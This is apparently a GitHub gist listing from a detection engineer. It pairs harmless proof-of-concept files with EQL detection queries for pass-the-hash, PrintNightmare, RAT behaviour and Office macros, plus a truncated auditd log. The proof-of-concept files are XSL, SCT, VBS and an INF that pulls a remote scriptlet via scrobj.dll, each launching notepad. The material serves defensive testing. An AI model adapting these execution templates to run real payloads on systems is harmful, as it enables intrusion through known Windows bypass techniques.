Samirbous
Samirbous
/ notepad.xsl
Created
April 13, 2021 23:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0'?> | |
| <stylesheet | |
| xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
| xmlns:user="placeholder" | |
| version="1.0"> | |
| <output method="text"/> | |
| <ms:script implements-prefix="user" language="Jscript"> | |
| <![CDATA[ | |
| var x = new ActiveXObject("WScript.Shell").Run("notepad.exe"); | |
| ]]></ms:script> |
Samirbous
/ notepad.sct
Created
April 13, 2021 23:18
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Empire" | |
| progid="Empire" | |
| version="1.00" | |
| classid="{20001111-0000-0000-0000-0000FEEDACDC}" | |
| > |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Dim shl | |
| Set shl = CreateObject("Wscript.Shell") | |
| Call shl.Run("notepad.exe") | |
| Set shl = Nothing | |
| WScript.Quit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| </registration> |
Samirbous
/ notepad.inf
Created
June 14, 2021 08:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [version] | |
| signature=$WiNdows NT$ | |
| [DefaultInstall_SingleUser] | |
| UnRegisterOCXs=D9AB | |
| [D9AB] | |
| %11%\scrobj.dll,NI,https://gist.githubusercontent.com/Samirbous/f581143f7ce4c3697f31d8780c1c45c6/raw/054f3af511b37dae556789161bbea1ad222b5f65/notepad.sct | |
| [Strings] | |
| serviceName=" " | |
| shortSvcName=" " |
Samirbous
/ SharpNamedPipePTH
Created
June 16, 2021 14:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sequence by host.id with maxspan=1m | |
| [authentication where event.action : "logged-in" and | |
| event.outcome == "success" and user.id: "S-1-5-21-*" and | |
| process.pid == 0 and | |
| winlog.event_data.LogonProcessName:"NtLmSsp*"and | |
| winlog.event_data.LogonType == 3 and source.ip == "127.0.0.1"] by winlog.event_data.TargetLogonId | |
| [process where event.type == "start"] by winlog.event_data.TargetLogonId |
Samirbous
/ Hunt for LPE via printnightmare
Last active
July 9, 2021 03:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sequence by host.hostname with maxspan=1m | |
| [network where network.direction : ("egress", "outgoing") and | |
| process.name != "spoolsv.exe" and not network.protocol == "dns" and not user.name : "SYSTEM" and | |
| source.port >= 49152 and destination.port >= 49152] by destination.address,source.address, destination.port, source.port | |
| [network where process.name : "spoolsv.exe" and user.name : "SYSTEM" and | |
| network.direction : ("ingress", "incoming") and | |
| not network.protocol == "dns" and | |
| source.port >= 49152 and destination.port >= 49152] by source.address, destination.address, destination.port, source.port |
Samirbous
/ detect xpertrat behavior
Created
October 26, 2021 16:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| process where event.action : "start" and | |
| process.executable : "?:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" and | |
| process.args_count <= 2 and process.args_count > 1 and | |
| not process.args : "?:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" |
Samirbous
/ EQL hunt for Potential Macro on close
Created
November 16, 2021 14:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sequence by host.id with maxspan=1s | |
| [process where event.action : "creation_event" and | |
| process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe") and | |
| not (process.executable : ("?:\\Windows\\System32\\WerFault.exe", "?:\\WINDOWS\\splwow64.exe") and | |
| process.args_count >= 2) | |
| ] by process.parent.entity_id | |
| [process where event.action : "termination_event" and | |
| process.name : ("winword.exe", "excel.exe", "powerpnt.exe") and | |
| process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe", "explorer.exe", "outlook.exe", "thunderbird.exe") | |
| ] by process.entity_id |
Samirbous
/ log4j-auditd-log-example
Created
December 13, 2021 08:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| type=PROCTITLE msg=audit(12/13/2021 01:49:50.838:66) : proctitle=/bin/bash | |
| type=PATH msg=audit(12/13/2021 01:49:50.838:66) : item=2 name=/lib64/ld-linux-x86-64.so.2 inode=4194344 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0 | |
| type=PATH msg=audit(12/13/2021 01:49:50.838:66) : item=1 name=/usr/bin/clear inode=4194578 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0 | |
| type=PATH msg=audit(12/13/2021 01:49:50.838:66) : item=0 name=/usr/bin/clear inode=4194578 dev=08:01 mode=file,755 ouid=root ogid=root rdev=00:00 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0 | |
| type=CWD msg=audit(12/13/2021 01:49:50.838:66) : cwd=/home/kali | |
| type=EXECVE msg=audit(12/13/2021 01:49:50.838:66) : argc=1 a0=clear | |
| type=SYSCALL msg=audit(12/13/2021 01:49:50.838:66) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x5613225618a0 a1=0x56132257a310 a2= |
OlderNewer